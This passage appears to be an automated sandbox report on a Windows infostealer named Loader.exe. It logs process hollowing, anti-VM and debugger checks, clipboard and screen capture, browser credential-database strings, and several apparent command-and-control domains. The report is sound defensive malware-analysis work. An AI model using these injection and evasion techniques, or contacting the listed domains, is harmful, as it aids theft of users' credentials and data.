                Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49756 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49757 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49758 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49759 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49760 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49761 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.11.20:49762 version: TLS 1.2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00431B60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00431B60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_05C91000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,3_2_05C91000
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00431B60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00431B60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00432538 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_00432538
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CDEA8E0_2_00CDEA8E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CD34400_2_00CD3440
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CCDDE20_2_00CCDDE2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CE05020_2_00CE0502
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CC96DB0_2_00CC96DB
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043E8403_2_0043E840
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040A1F23_2_0040A1F2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004372C03_2_004372C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00421A9F3_2_00421A9F
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043F2A03_2_0043F2A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040AB403_2_0040AB40
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00418B323_2_00418B32
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040E4603_2_0040E460
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043AC603_2_0043AC60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00410D783_2_00410D78
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004375F03_2_004375F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004256E03_2_004256E0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004086803_2_00408680
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004196A03_2_004196A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004227C03_2_004227C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041C06C3_2_0041C06C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043E0103_2_0043E010
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042C8363_2_0042C836
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040B0C03_2_0040B0C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043E0D03_2_0043E0D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042E8903_2_0042E890
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004039403_2_00403940
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042B94C3_2_0042B94C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043B1603_2_0043B160
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043E1603_2_0043E160
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004261703_2_00426170
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004279093_2_00427909
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004149103_2_00414910
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043511D3_2_0043511D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004371E03_2_004371E0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041E9F83_2_0041E9F8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004059803_2_00405980
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004389903_2_00438990
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004089A03_2_004089A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004119B23_2_004119B2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041BA453_2_0041BA45
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004222663_2_00422266
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004062703_2_00406270
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00408A703_2_00408A70
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042327B3_2_0042327B
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00436A003_2_00436A00
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042820E3_2_0042820E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00428A333_2_00428A33
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004042F03_2_004042F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00426AF93_2_00426AF9
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004222803_2_00422280
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004082903_2_00408290
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004382A03_2_004382A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004093303_2_00409330
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00438BF83_2_00438BF8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00417B873_2_00417B87
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042FB903_2_0042FB90
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043EB903_2_0043EB90
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00402BA03_2_00402BA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041D4403_2_0041D440
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00436C603_2_00436C60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00435C003_2_00435C00
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004214103_2_00421410
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00404C203_2_00404C20
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043E4C03_2_0043E4C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00425CD93_2_00425CD9
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004074E03_2_004074E0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004284F03_2_004284F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004154803_2_00415480
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004234883_2_00423488
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041CCA03_2_0041CCA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00424D503_2_00424D50
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043DD503_2_0043DD50
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041BD603_2_0041BD60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004265653_2_00426565
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041FD703_2_0041FD70
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00414D123_2_00414D12
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042ED3C3_2_0042ED3C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00424DD03_2_00424DD0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004275D83_2_004275D8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043B5803_2_0043B580
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042B66B3_2_0042B66B
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041A6703_2_0041A670
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004356013_2_00435601
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043D6213_2_0043D621
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043DEC03_2_0043DEC0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00405ED03_2_00405ED0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004186833_2_00418683
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00402F403_2_00402F40
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004317503_2_00431750
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00426F6C3_2_00426F6C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004097703_2_00409770
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004067003_2_00406700
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041D7003_2_0041D700
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041770C3_2_0041770C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043EF103_2_0043EF10
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00437F203_2_00437F20
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00415F2D3_2_00415F2D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004277C53_2_004277C5
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00408FF03_2_00408FF0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041F7853_2_0041F785
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00CDEA8E3_2_00CDEA8E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00CD34403_2_00CD3440
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00CCDDE23_2_00CCDDE2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00CE05023_2_00CE0502
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00CC96DB3_2_00CC96DB
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00CD1D28 appears 42 times
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00CC9BF0 appears 94 times
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00408070 appears 49 times
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00414900 appears 70 times
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00CD670D appears 34 times
                Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Loader.exeStatic PE information: Section: .BSS ZLIB complexity 1.000330982592282
                Source: Loader.exeStatic PE information: Section: .BSS ZLIB complexity 1.000330982592282
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@1/1
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004375F0 RtlExpandEnvironmentStrings,RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_004375F0
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:304:WilStaging_02
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_03
                Source: Loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Loader.exe, 00000003.00000003.91061190974.0000000005E9E000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91061092104.0000000006033000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
                Source: Loader.exe, 00000003.00000003.91074609704.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91061837230.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062365302.0000000005E49000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91075220023.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91075830816.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074354314.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91087642518.0000000005E5F000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91061681849.0000000006036000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074733940.0000000005E59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Loader.exe, 00000003.00000003.91074970558.0000000005E63000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91075395661.000000000604A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
                Source: Loader.exeReversingLabs: Detection: 29%
                Source: C:\Users\user\Desktop\Loader.exeFile read: C:\Users\user\Desktop\Loader.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CC9DAA push ecx; ret 0_2_00CC9DBD
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CF1641 push ss; iretd 0_2_00CF1642
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CF1621 push ss; iretd 0_2_00CF1622
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CF1631 push ss; iretd 0_2_00CF1632
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004440E1 push esi; retf 0000h3_2_004440E2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004479AD push eax; iretd 3_2_004479AE
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043DD10 push eax; mov dword ptr [esp], 89888F5Eh3_2_0043DD11
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00CC9DAA push ecx; ret 3_2_00CC9DBD
                Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\Loader.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeWindow / User API: threadDelayed 9968Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exe TID: 7568Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Loader.exe TID: 6732Thread sleep count: 9968 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\Loader.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Loader.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CDB6E8 FindFirstFileExW,0_2_00CDB6E8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CDB799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00CDB799
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00CDB6E8 FindFirstFileExW,3_2_00CDB6E8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00CDB799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00CDB799
                Source: Loader.exe, 00000003.00000002.96102694603.000000000335C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                Source: Loader.exe, 00000003.00000003.91118614146.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91781075623.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778841405.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91058782608.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103019944.000000000339C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105992992.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91127781720.0000000003399000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3
                Source: Loader.exe, 00000003.00000003.91118614146.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91781075623.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778841405.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91058782608.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103019944.000000000339C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105992992.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91127781720.0000000003399000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\Loader.exeAPI call chain: ExitProcess graph end nodegraph_3-30073
                Source: C:\Users\user\Desktop\Loader.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043C680 LdrInitializeThunk,3_2_0043C680
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CD1A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CD1A60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CF019E mov edi, dword ptr fs:[00000030h]0_2_00CF019E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CC1BA0 mov edi, dword ptr fs:[00000030h]0_2_00CC1BA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00CC1BA0 mov edi, dword ptr fs:[00000030h]3_2_00CC1BA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CD7020 GetProcessHeap,0_2_00CD7020
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CC9A67 SetUnhandledExceptionFilter,0_2_00CC9A67
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CD1A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CD1A60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CC9A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CC9A73
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CC96B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00CC96B3
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00CC9A67 SetUnhandledExceptionFilter,3_2_00CC9A67
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00CD1A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00CD1A60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00CC9A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00CC9A73
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00CC96B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00CC96B3

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00CF019E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00CF019E
                Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Users\user\Desktop\Loader.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: Loader.exe, 00000000.00000002.91037565997.0000000000A6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
                Source: Loader.exe, 00000000.00000002.91037565997.0000000000A6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
                Source: Loader.exe, 00000000.00000002.91037565997.0000000000A6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
                Source: Loader.exe, 00000000.00000002.91037565997.0000000000A6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
                Source: Loader.exe, 00000000.00000002.91037565997.0000000000A6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
                Source: Loader.exe, 00000000.00000002.91037565997.0000000000A6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
                Source: Loader.exe, 00000000.00000002.91037565997.0000000000A6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
                Source: Loader.exe, 00000000.00000002.91037565997.0000000000A6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
                Source: Loader.exe, 00000000.00000002.91037565997.0000000000A6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: stingyerasjhru.click
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_00CDB0C5
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_00CD68FD
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00CDB1B7
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_00CDB110
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_00CDB2BD
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00CDAA37
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_00CD63F5
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_00CDAC88
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00CDAD30
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_00CDAFF0
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_00CDAF83
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,3_2_00CDB0C5
